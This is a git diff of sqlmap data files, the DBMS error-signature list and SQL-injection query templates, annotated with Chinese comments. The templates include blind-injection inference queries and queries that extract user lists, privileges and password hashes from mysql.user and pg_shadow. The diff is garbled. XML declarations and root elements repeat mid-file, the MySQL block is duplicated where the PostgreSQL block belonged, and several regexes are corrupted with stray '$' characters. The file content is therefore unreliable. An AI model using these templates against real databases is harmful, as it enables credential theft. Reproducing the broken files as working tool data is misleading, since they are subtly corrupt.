+        <error regexp="$MonetDB$\[ODBC Driver"/>  <!-- 匹配MonetDB ODBC驱动的错误信息 -->
+        <error regexp="nl\.cwi\.monetdb\.jdbc"/>  <!-- 匹配MonetDB JDBC驱动的错误信息 -->
     </dbms>
+</root>
+
 
-    <dbms value="Apache Derby">
-        <error regexp="Syntax error: Encountered"/>
-        <error regexp="org\.apache\.derby"/>
-        <error regexp="ERROR 42X01"/>
+<?xml version="1.0" encoding="UTF-8"?>  <!-- 声明XML文档的版本为1.0，编码使用UTF-8 -->
+
+<root>  <!-- 根元素，包含所有其他元素 -->
+    <dbms value="Microsoft Access">  <!-- 定义数据库管理系统为Microsoft Access -->
+        <error regexp="Microsoft Access (\d+ )?Driver"/>  <!-- 匹配包含"Microsoft Access"和"Driver"的错误信息，支持可选的版本号 -->
+        <error regexp="JET Database Engine"/>  <!-- 匹配JET数据库引擎的错误信息 -->
+        <error regexp="Access Database Engine"/>  <!-- 匹配Access数据库引擎的错误信息 -->
+        <error regexp="ODBC Microsoft Access"/>  <!-- 匹配ODBC与Microsoft Access相关的错误信息 -->
+        <error regexp="Syntax error $missing operator$ in query expression"/>  <!-- 匹配查询表达式中缺失操作符的语法错误 -->
+    </dbms>
+
+    <dbms value="Oracle">  <!-- 定义数据库管理系统为Oracle -->
+        <error regexp="\bORA-\d{5}"/>  <!-- 匹配ORA错误代码，后跟五位数字 -->
+        <error regexp="Oracle error"/>  <!-- 匹配通用的Oracle错误信息 -->
+        <error regexp="Oracle.*?Driver"/>  <!-- 匹配与Oracle驱动相关的错误信息 -->
+        <error regexp="Warning.*?\W(oci|ora)_"/>  <!-- 匹配OCI或ORA相关的警告信息 -->
+        <error regexp="quoted string not properly terminated"/>  <!-- 匹配未正确结束的引用字符串的错误信息 -->
+        <error regexp="SQL command not properly ended"/>  <!-- 匹配SQL命令未正确结束的错误信息 -->
+        <error regexp="macromedia\.jdbc\.oracle"/>  <!-- 匹配Macromedia的Oracle JDBC驱动的错误信息 -->
+        <error regexp="oracle\.jdbc"/>  <!-- 匹配Oracle JDBC驱动的错误信息 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>  <!-- 匹配Zend框架中Oracle相关的异常信息 -->
+        <error regexp="Pdo[./_\\](Oracle|OCI)"/>  <!-- 匹配PDO的Oracle或OCI驱动的错误信息 -->
+        <error regexp="OracleException"/>  <!-- 匹配Oracle异常的错误信息 -->
     </dbms>
 
-    <dbms value="Vertica">
-        <error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
-        <error regexp="/vertica/Parser/scan"/>
-        <error regexp="com\.vertica\.jdbc"/>
-        <error regexp="org\.jkiss\.dbeaver\.ext\.vertica"/>
-        <error regexp="com\.vertica\.dsi\.dataengine"/>
+    <dbms value="IBM DB2">  <!-- 定义数据库管理系统为IBM DB2 -->
+        <error regexp="CLI Driver.*?DB2"/>  <!-- 匹配DB2 CLI驱动的错误信息 -->
+        <error regexp="DB2 SQL error"/>  <!-- 匹配DB2 SQL错误的通用错误信息 -->
+        <error regexp="\bdb2_\w+\(" />  <!-- 匹配DB2相关函数调用的错误信息 -->
+        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>  <!-- 匹配包含SQLCODE和SQLSTATE的错误信息 -->
+        <error regexp="com\.ibm\.db2\.jcc"/>  <!-- 匹配IBM DB2 JCC驱动的错误信息 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>  <!-- 匹配Zend框架中DB2相关的异常信息 -->
+        <error regexp="Pdo[./_\\]Ibm"/>  <!-- 匹配PDO IBM DB2驱动的错误信息 -->
+        <error regexp="DB2Exception"/>  <!-- 匹配DB2异常的错误信息 -->
+        <error regexp="ibm_db_dbi\.ProgrammingError"/>  <!-- 匹配ibm_db_dbi模块中的编程错误信息 -->
     </dbms>
 
-    <dbms value="Mckoi">
-        <error regexp="com\.mckoi\.JDBCDriver"/>
-        <error regexp="com\.mckoi\.database\.jdbc"/>
-        <error regexp="&lt;REGEX_LITERAL&gt;"/>
+    <dbms value="Informix">  <!-- 定义数据库管理系统为Informix -->
+        <error regexp="Warning.*?\Wifx_"/>  <!-- 匹配Informix扩展相关的警告信息 -->
+        <error regexp="Exception.*?Informix"/>  <!-- 匹配Informix相关的异常信息 -->
+        <error regexp="Informix ODBC Driver"/>  <!-- 匹配Informix ODBC驱动的错误信息 -->
+        <error regexp="ODBC Informix driver"/>  <!-- 匹配ODBC Informix驱动的错误信息 -->
+        <error regexp="com\.informix\.jdbc"/>  <!-- 匹配Informix JDBC驱动的错误信息 -->
+        <error regexp="weblogic\.jdbc\.informix"/>  <!-- 匹配WebLogic中Informix JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Informix"/>  <!-- 匹配PDO Informix驱动的错误信息 -->
+        <error regexp="IfxException"/>  <!-- 匹配Informix异常的错误信息 -->
+    </dbms>
+
+    <!-- Interbase/Firebird -->
+    <dbms value="Firebird">  <!-- 定义数据库管理系统为Firebird -->
+        <error regexp="Dynamic SQL Error"/>  <!-- 匹配动态SQL错误的错误信息 -->
+        <error regexp="Warning.*?\Wibase_"/>  <!-- 匹配Firebird扩展相关的警告信息 -->
+        <error regexp="org\.firebirdsql\.jdbc"/>  <!-- 匹配Firebird SQL JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Firebird"/>  <!-- 匹配PDO Firebird驱动的错误信息 -->
     </dbms>
 
-    <dbms value="Presto">
-        <error regexp="com\.facebook\.presto\.jdbc"/>
-        <error regexp="io\.prestosql\.jdbc"/>
-        <error regexp="com\.simba\.presto\.jdbc"/>
-        <error regexp="UNION query has different number of fields: \d+, \d+"/>
-        <error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
+    <dbms value="SQLite">  <!-- 定义数据库管理系统为SQLite -->
+        <error regexp="SQLite/JDBCDriver"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
+        <error regexp="SQLite\.Exception"/>  <!-- 匹配SQLite异常的错误信息 -->
+        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>  <!-- 匹配Microsoft或System Data的SQLite异常信息 -->
+        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>  <!-- 匹配与SQLite或SQLite3相关的警告信息 -->
+        <error regexp="$SQLITE_ERROR$"/>  <!-- 匹配SQLite错误的错误信息 -->
+        <error regexp="SQLite error \d+:"/>  <!-- 匹配SQLite错误代码的信息 -->
+        <error regexp="sqlite3.OperationalError:"/>  <!-- 匹配SQLite3操作错误的信息 -->
+        <error regexp="SQLite3::SQLException"/>  <!-- 匹配SQLite3 SQL异常的信息 -->
+        <error regexp="org\.sqlite\.JDBC"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Sqlite"/>  <!-- 匹配PDO SQLite驱动的错误信息 -->
+        <error regexp="SQLiteException"/>  <!-- 匹配SQLite异常的错误信息 -->
     </dbms>
 
-    <dbms value="Altibase">
-        <error regexp="Altibase\.jdbc\.driver"/>
+    <dbms value="SAP MaxDB">  <!-- 定义数据库管理系统为SAP MaxDB -->
+        <error regexp="SQL error.*?POS([0-9]+)"/>  <!-- 匹配SQL错误信息，并捕捉位置编号 -->
+        <error regexp="Warning.*?\Wmaxdb_"/>  <!-- 匹配MaxDB扩展相关的警告信息 -->
+        <error regexp="DriverSapDB"/>  <!-- 匹配SapDB驱动的错误信息 -->
+        <error regexp="-3014.*?Invalid end of SQL statement"/>  <!-- 匹配SQL语句无效结束的错误信息 -->
+        <error regexp="com\.sap\.dbtech\.jdbc"/>  <!-- 匹配SAP DBTech JDBC驱动的错误信息 -->
+        <error regexp="$-3008$.*?: Invalid keyword or missing delimiter"/>  <!-- 匹配无效关键字或缺失分隔符的错误信息 -->
     </dbms>
 
-    <dbms value="MimerSQL">
-        <error regexp="com\.mimer\.jdbc"/>
-        <error regexp="Syntax error,[^\n]+assumed to mean"/>
+    <dbms value="Sybase">  <!-- 定义数据库管理系统为Sybase -->
+        <error regexp="Warning.*?\Wsybase_"/>  <!-- 匹配Sybase扩展相关的警告信息 -->
+        <error regexp="Sybase message"/>  <!-- 匹配Sybase消息的错误信息 -->
+        <error regexp="Sybase.*?Server message"/>  <!-- 匹配Sybase服务器消息的错误信息 -->
+        <error regexp="SybSQLException"/>  <!-- 匹配Sybase异常的错误信息 -->
+        <error regexp="Sybase\.Data\.AseClient"/>  <!-- 匹配Sybase .NET AseClient的错误信息 -->
+        <error regexp="com\.sybase\.jdbc"/>  <!-- 匹配Sybase JDBC驱动的错误信息 -->
     </dbms>
 
-    <dbms value="ClickHouse">
-        <error regexp="Code: \d+. DB::Exception:"/>
-        <error regexp="Syntax error: failed at position \d+"/>
+    <dbms value="Ingres">  <!-- 定义数据库管理系统为Ingres -->
+        <error regexp="Warning.*?\Wingres_"/>  <!-- 匹配Ingres扩展相关的警告信息 -->
+        <error regexp="Ingres SQLSTATE"/>  <!-- 匹配Ingres SQLSTATE的错误信息 -->
+        <error regexp="Ingres\W.*?Driver"/>  <!-- 匹配Ingres驱动的错误信息 -->
+        <error regexp="com\.ingres\.gcf\.jdbc"/>  <!-- 匹配Ingres GCF JDBC驱动的错误信息 -->
     </dbms>
 
-    <dbms value="CrateDB">
-        <error regexp="io\.crate\.client\.jdbc"/>
+    <dbms value="FrontBase">  <!-- 定义数据库管理系统为FrontBase -->
+        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>  <!-- 匹配回滚事务的异常信息 -->
+        <error regexp="com\.frontbase\.jdbc"/>  <!-- 匹配FrontBase JDBC驱动的错误信息 -->
+        <error regexp="Syntax error 1. Missing"/>  <!-- 匹配语法错误，未找到某些内容 -->
+        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>  <!-- 匹配语义或语法错误，后跟特定的错误码 -->
     </dbms>
 
-    <dbms value="Cache">
-        <error regexp="encountered after end of query"/>
-        <error regexp="A comparison operator is required here"/>
+    <dbms value="HSQLDB">  <!-- 定义数据库管理系统为HSQLDB -->
+        <error regexp="Unexpected end of command in statement $"/>  <!-- 匹配在SQL语句中指令意外结束的错误信息 -->
+        <error regexp="Unexpected token.*?in statement \["/>  <!-- 匹配在SQL语句中意外标记的错误信息 -->
+        <error regexp="org\.hsqldb\.jdbc"/>  <!-- 匹配HSQLDB JDBC驱动的错误信息 -->
     </dbms>
 
-    <dbms value="Raima Database Manager">
-        <error regexp="-10048: Syntax error"/>
-        <error regexp="rdmStmtPrepare\(.+?\) returned"/>
+    <dbms value="H2">  <!-- 定义数据库管理系统为H2 -->
+        <error regexp="org\.h2\.jdbc"/>  <!-- 匹配H2 JDBC驱动的错误信息 -->
+        <error regexp="\[42000-192$"/>  <!-- 匹配H2特定错误代码的信息 -->
     </dbms>
 
-    <dbms value="Virtuoso">
-        <error regexp="SQ074: Line \d+:"/>
-        <error regexp="SR185: Undefined procedure"/>
-        <error regexp="SQ200: No table "/>
-        <error regexp="Virtuoso S0002 Error"/>
-        <error regexp="\[(Virtuoso Driver|Virtuoso iODBC Driver)\]\[Virtuoso Server\]"/>
+    <dbms value="MonetDB">  <!-- 定义数据库管理系统为MonetDB -->
+        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>  <!-- 匹配包含特定错误前缀的MonetDB错误信息 -->
+        <error regexp="$MonetDB$\[ODBC Driver"/>  <!-- 匹配MonetDB ODBC驱动的错误信息 -->
+        <error regexp="nl\.cwi\.monetdb\.jdbc"/>  <!-- 匹配MonetDB JDBC驱动的错误信息 -->
     </dbms>
 </root>
diff --git a/src/sqlmap-master/data/xml/queries.xml b/src/sqlmap-master/data/xml/queries.xml
index 28b5582..4652872 100644
--- a/src/sqlmap-master/data/xml/queries.xml
+++ b/src/sqlmap-master/data/xml/queries.xml
@@ -1,1177 +1,668 @@
 <?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
 
 <root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
     <dbms value="MySQL">
-        <!-- http://dba.fyicenter.com/faq/mysql/Difference-between-CHAR-and-NCHAR.html -->
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
         <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
         <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
         <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
         <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
         <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
         <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
         <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
         <limitgroupstop query="2"/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
         <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
         <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
         <count query="COUNT(%s)"/>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
         <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
         <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
         <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
         <hex query="HEX(%s)"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
         <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
         <banner query="VERSION()"/>
+        
+        <!-- 获取当前用户 -->
         <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
         <current_db query="DATABASE()"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
         <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
         <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
         <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
         <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
         <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
         <users>
+            <!-- 获取所有用户的权限信息 -->
             <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
             <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
         </users>
-        <!-- https://github.com/dev-sec/mysql-baseline/issues/35 -->
-        <!-- https://stackoverflow.com/a/31122246 -->
+        
+        <!-- 密码相关的查询模板 -->
         <passwords>
+            <!-- 获取所有用户的用户名和密码哈希 -->
             <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
             <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
         </passwords>
+        
+        <!-- 权限相关的查询模板 -->
         <privileges>
+            <!-- 获取所有用户的权限信息 -->
             <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
             <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
-        </privileges>
-        <roles/>
-        <statements>
-            <inband query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST" query2="SELECT INFO FROM DATA_DICTIONARY.PROCESSLIST"/>
-            <blind query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST ORDER BY ID LIMIT %d,1" query2="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE ID=%d" query3="SELECT ID FROM INFORMATION_SCHEMA.PROCESSLIST LIMIT %d,1" count="SELECT COUNT(DISTINCT(INFO)) FROM INFORMATION_SCHEMA.PROCESSLIST"/>
-        </statements>
-        <dbs>
-            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT db FROM mysql.db"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES" query2="SELECT database_name,table_name FROM mysql.innodb_table_stats" condition="table_schema" condition2="database_name"/>
-            <blind query="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' LIMIT %d,1" query2="SELECT table_name FROM mysql.innodb_table_stats WHERE database_name='%s' LIMIT %d,1" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count2="SELECT COUNT(table_name) FROM mysql.innodb_table_stats WHERE database_name='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
-            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
-            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1" count="SELECT COUNT(*) FROM %s.%s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" query2="SELECT db FROM mysql.db WHERE %s" condition="schema_name" condition2="db"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" query2="SELECT DISTINCT(db) FROM mysql.db WHERE %s" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db WHERE %s" condition="schema_name" condition2="db"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
-            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
-            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
-        </search_column>
-    </dbms>
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
 
-    <dbms value="PostgreSQL">
-        <cast query="CAST(%s AS VARCHAR(10000))"/>
-        <length query="LENGTH(%s)"/>
-        <!-- NOTE: PostgreSQL does not like COALESCE with different data-types (e.g. COALESCE(id,' ')) -->
-        <isnull query="COALESCE(%s::text,' ')"/>
-        <delimiter query="||"/>
-        <limit query="OFFSET %d LIMIT %d"/>
-        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+<root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
+    <dbms value="MySQL">
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
+        <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
+        <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
+        <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
+        <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
+        <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
         <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
         <limitgroupstop query="2"/>
-        <limitstring query=" OFFSET "/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
+        <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
         <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
         <count query="COUNT(%s)"/>
-        <comment query="--" query2="/*"/>
-        <substring query="SUBSTRING((%s)::text FROM %d FOR %d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <hex query="ENCODE(CONVERT_TO((%s),'UTF8'),'HEX')"/>
-        <inference query="ASCII(SUBSTRING((%s)::text FROM %d FOR 1))>%d"/>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
+        <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
+        <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
+        <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
+        <hex query="HEX(%s)"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
         <banner query="VERSION()"/>
-        <current_user query="CURRENT_USER"/>
-        <current_db query="CURRENT_SCHEMA()"/>
-        <hostname/>
-        <!--<table_comment query="SELECT pg_catalog.obj_description(c.oid) FROM pg_catalog.pg_class c WHERE c.relname='%s'"/>-->
-        <table_comment query="SELECT description FROM pg_description JOIN pg_class ON pg_description.objoid=pg_class.oid JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid WHERE nspname='%s' AND relname='%s'"/>
-        <column_comment query="SELECT col_description(pg_class.oid,pg_attribute.attnum) FROM pg_class JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid JOIN pg_attribute ON pg_class.oid=pg_attribute.attrelid WHERE nspname='%s' AND relname='%s' AND attname='%s'"/>
-        <is_dba query="(SELECT usesuper=true FROM pg_user WHERE usename=CURRENT_USER OFFSET 0 LIMIT 1)"/>
-        <check_udf query="(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)"/>
+        
+        <!-- 获取当前用户 -->
+        <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
+        <current_db query="DATABASE()"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
+        <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
+        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
+        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
         <users>
-            <inband query="SELECT usename FROM pg_user"/>
-            <blind query="SELECT DISTINCT(usename) FROM pg_user ORDER BY usename OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
         </users>
+        
+        <!-- 密码相关的查询模板 -->
         <passwords>
-            <inband query="SELECT usename,passwd FROM pg_shadow" condition="usename"/>
-            <blind query="SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'"/>
+            <!-- 获取所有用户的用户名和密码哈希 -->
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
         </passwords>
+        
+        <!-- 权限相关的查询模板 -->
         <privileges>
-            <inband query="SELECT usename,(CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user" condition="usename"/>
